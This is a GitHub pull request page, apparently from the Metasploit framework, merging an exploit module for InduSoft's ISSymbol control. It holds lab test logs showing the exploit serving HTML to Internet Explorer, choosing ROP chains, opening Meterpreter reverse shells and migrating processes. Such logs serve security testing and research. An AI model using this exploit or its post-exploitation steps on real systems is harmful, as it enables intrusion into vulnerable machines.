Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Indusoft issymbol internationalseparator #1183

Merged
merged 2 commits into from Dec 19, 2012
Merged

Indusoft issymbol internationalseparator #1183

merged 2 commits into from Dec 19, 2012

Conversation

jvazquez-r7
Copy link
Contributor

Initial submission by James Fitts

Some testing:

[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Target selected as: IE 9 on Windows 7
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Using JRE ROP
[*] 192.168.1.137    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.137:49477) at 2012-12-18 21:58:52 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.137:49477) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3240
[+] Successfully migrated to process 
[*] 192.168.1.137 - Meterpreter session 1 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > 
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.147:1193) at 2012-12-18 22:48:31 +0100
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.147:1193) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (220)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3508
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 2 closed.  Reason: Died
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Using msvcrt ROP
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.147:1205) at 2012-12-18 22:49:28 +0100
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.147:1205) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3300
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 7 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.147:1055) at 2012-12-18 23:45:18 +0100
[*] Session ID 4 (192.168.1.128:4444 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1936)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3272
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 4 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > 
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Requesting: /lElwXC
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Target selected as: IE 6 on Windows XP SP3
[*] 192.168.1.147    indusoft_issymbol_internationalseparator - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.147:1261) at 2012-12-18 23:46:09 +0100
[*] Session ID 5 (192.168.1.128:4444 -> 192.168.1.147:1261) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (2696)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2748
[+] Successfully migrated to process 
[*] 192.168.1.147 - Meterpreter session 5 closed.  Reason: Died

msf  exploit(indusoft_issymbol_internationalseparator) > exit

@wchen-r7
Copy link
Contributor

msf exploit(indusoft_issymbol_internationalseparator) > [] Server started.
[] 10.0.1.7 indusoft_issymbol_internationalseparator - Requesting: /FvoKg6
[] 10.0.1.7 indusoft_issymbol_internationalseparator - Target selected as: IE 8 on Windows 7
[] 10.0.1.7 indusoft_issymbol_internationalseparator - Using JRE ROP
[] 10.0.1.7 indusoft_issymbol_internationalseparator - Sending HTML...
[] Sending stage (752128 bytes) to 10.0.1.7
[] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.7:49166) at 2012-12-18 19:01:03 -0600
[] Session ID 3 (10.0.1.3:4444 -> 10.0.1.7:49166) processing InitialAutoRunScript 'migrate -f'
[] Current server process: iexplore.exe (3448)
[] Spawning notepad.exe process to migrate to
[+] Migrating to 3868
[+] Successfully migrated to process

@wchen-r7 wchen-r7 merged commit f820ffb into rapid7:master Dec 19, 2012
@jvazquez-r7 jvazquez-r7 deleted the indusoft_issymbol_internationalseparator branch November 18, 2014 15:49
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7